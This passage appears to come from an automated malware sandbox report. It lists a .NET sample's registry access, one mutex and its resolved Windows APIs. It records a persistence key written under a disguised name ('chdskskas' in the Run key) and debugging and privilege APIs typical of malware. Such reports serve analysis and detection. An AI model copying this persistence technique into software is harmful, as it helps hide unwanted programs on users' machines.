HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\chdskskas
Write Keys
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\chdskskas
Delete Keys
Nothing to display
Mutexes
Global\CLR_CASOFF_MUTEX
Resolved APIs
advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW advapi32.dll.RegEnumKeyExW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW kernel32.dll.FlsAlloc kernel32.dll.FlsFree kernel32.dll.FlsGetValue kernel32.dll.FlsSetValue kernel32.dll.InitializeCriticalSectionEx kernel32.dll.CreateEventExW kernel32.dll.CreateSemaphoreExW kernel32.dll.SetThreadStackGuarantee kernel32.dll.CreateThreadpoolTimer kernel32.dll.SetThreadpoolTimer kernel32.dll.WaitForThreadpoolTimerCallbacks kernel32.dll.CloseThreadpoolTimer kernel32.dll.CreateThreadpoolWait kernel32.dll.SetThreadpoolWait kernel32.dll.CloseThreadpoolWait kernel32.dll.FlushProcessWriteBuffers kernel32.dll.FreeLibraryWhenCallbackReturns kernel32.dll.GetCurrentProcessorNumber kernel32.dll.GetLogicalProcessorInformation kernel32.dll.CreateSymbolicLinkW kernel32.dll.EnumSystemLocalesEx kernel32.dll.CompareStringEx kernel32.dll.GetDateFormatEx kernel32.dll.GetLocaleInfoEx kernel32.dll.GetTimeFormatEx kernel32.dll.GetUserDefaultLocaleName kernel32.dll.IsValidLocaleName kernel32.dll.LCMapStringEx kernel32.dll.GetTickCount64 advapi32.dll.EventRegister mscoree.dll.#142 mscoreei.dll.RegisterShimImplCallback mscoreei.dll.OnShimDllMainCalled mscoreei.dll._CorExeMain shlwapi.dll.UrlIsW version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW kernel32.dll.InitializeCriticalSectionAndSpinCount kernel32.dll.IsProcessorFeaturePresent msvcrt.dll._set_error_mode msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z kernel32.dll.FindActCtxSectionStringW kernel32.dll.GetSystemWindowsDirectoryW mscoree.dll.GetProcessExecutableHeap mscoreei.dll.GetProcessExecutableHeap mscorwks.dll._CorExeMain mscorwks.dll.GetCLRFunction advapi32.dll.RegisterTraceGuidsW advapi32.dll.UnregisterTraceGuids advapi32.dll.GetTraceLoggerHandle advapi32.dll.GetTraceEnableLevel advapi32.dll.GetTraceEnableFlags advapi32.dll.TraceEvent mscoree.dll.IEE mscoreei.dll.IEE mscorwks.dll.IEE mscoree.dll.GetStartupFlags mscoreei.dll.GetStartupFlags mscoree.dll.GetHostConfigurationFile mscoreei.dll.GetHostConfigurationFile mscoreei.dll.GetCORVersion mscoree.dll.GetCORSystemDirectory mscoreei.dll.GetCORSystemDirectory_RetAddr mscoreei.dll.CreateConfigStream ntdll.dll.RtlUnwind kernel32.dll.IsWow64Process advapi32.dll.AllocateAndInitializeSid advapi32.dll.OpenProcessToken advapi32.dll.GetTokenInformation advapi32.dll.InitializeAcl advapi32.dll.AddAccessAllowedAce advapi32.dll.FreeSid kernel32.dll.AddVectoredContinueHandler kernel32.dll.RemoveVectoredContinueHandler advapi32.dll.ConvertSidToStringSidW shell32.dll.SHGetFolderPathW kernel32.dll.GetWriteWatch kernel32.dll.ResetWriteWatch kernel32.dll.CreateMemoryResourceNotification kernel32.dll.QueryMemoryResourceNotification kernel32.dll.QueryActCtxW kernel32.dll.GetVersionExW kernel32.dll.GetFullPathNameW ole32.dll.CoInitializeEx cryptbase.dll.SystemFunction036 ole32.dll.CoGetContextToken advapi32.dll.CryptAcquireContextA advapi32.dll.CryptReleaseContext advapi32.dll.CryptCreateHash advapi32.dll.CryptDestroyHash advapi32.dll.CryptHashData advapi32.dll.CryptGetHashParam advapi32.dll.CryptImportKey advapi32.dll.CryptExportKey advapi32.dll.CryptGenKey advapi32.dll.CryptGetKeyParam advapi32.dll.CryptDestroyKey advapi32.dll.CryptVerifySignatureA advapi32.dll.CryptSignHashA advapi32.dll.CryptGetProvParam advapi32.dll.CryptGetUserKey advapi32.dll.CryptEnumProvidersA mscoree.dll.GetMetaDataInternalInterface mscoreei.dll.GetMetaDataInternalInterface mscorwks.dll.GetMetaDataInternalInterface mscorjit.dll.getJit kernel32.dll.lstrlen kernel32.dll.lstrlenW mscoree.dll.ND_RI4 mscoreei.dll.ND_RI4 kernel32.dll.GetUserDefaultUILanguage kernel32.dll.SetErrorMode kernel32.dll.GetFileAttributesExW mscoreei.dll.LoadLibraryShim culture.dll.ConvertLangIdToCultureName kernel32.dll.GlobalMemoryStatusEx bcrypt.dll.BCryptGetFipsAlgorithmMode kernel32.dll.VirtualProtect kernel32.dll.GetEnvironmentVariableW kernel32.dll.SwitchToThread kernel32.dll.CloseHandle kernel32.dll.GetCurrentProcessId advapi32.dll.LookupPrivilegeValueW kernel32.dll.GetCurrentProcess advapi32.dll.AdjustTokenPrivileges kernel32.dll.OpenProcess psapi.dll.EnumProcessModules psapi.dll.GetModuleInformation psapi.dll.GetModuleBaseNameW psapi.dll.GetModuleFileNameExW kernel32.dll.GetProcAddress kernel32.dll.DebugActiveProcess kernel32.dll.WaitForDebugEvent kernel32.dll.ContinueDebugEvent kernel32.dll.DeleteFileA advapi32.dll.SetKernelObjectSecurity advapi32.dll.GetKernelObjectSecurity ntdll.dll.NtSetInformationProcess ntdll.dll.NtProtectVirtualMemory kernel32.dll.GetModuleFileNameW shfolder.dll.SHGetFolderPathW kernel32.dll.CopyFileW kernel32.dll.LocalFree kernel32.dll.CreatePipe kernel32.dll.DuplicateHandle kernel32.dll.GetStdHandle kernel32.dll.GetCurrentDirectoryW kernel32.dll.CreateProcessW kernel32.dll.GetFileType kernel32.dll.GetConsoleCP kernel32.dll.GetACP kernel32.dll.UnmapViewOfFile kernel32.dll.GetConsoleOutputCP kernel32.dll.WriteFile 